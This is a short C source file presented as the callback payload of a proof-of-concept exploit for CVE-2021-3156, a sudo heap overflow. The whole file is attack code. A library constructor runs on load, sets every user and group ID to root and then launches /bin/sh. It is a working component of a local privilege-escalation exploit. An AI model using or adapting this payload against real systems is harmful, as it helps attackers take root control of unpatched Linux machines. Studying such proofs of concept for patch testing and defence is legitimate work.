/*

	CVE-2021-3156 PoC
	
	-- this is just the callback code --
	
*/

#define _GNU_SOURCE 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define EXECVE_SHELL_PATH "/bin/sh"
 
static void __attribute__ ((constructor)) pop_shell(void);
char *n[] = {NULL};

void pop_shell(void) {
	printf("[+] callback executed!\n");
	setresuid(0, 0, 0);
	setresgid(0, 0, 0);
	if(getuid() == 0) {
		puts("[+] we are root!");
	} else {
		puts("[-] something went wrong!");
		exit(0);
	}
	
	execve(EXECVE_SHELL_PATH, n, n);

}
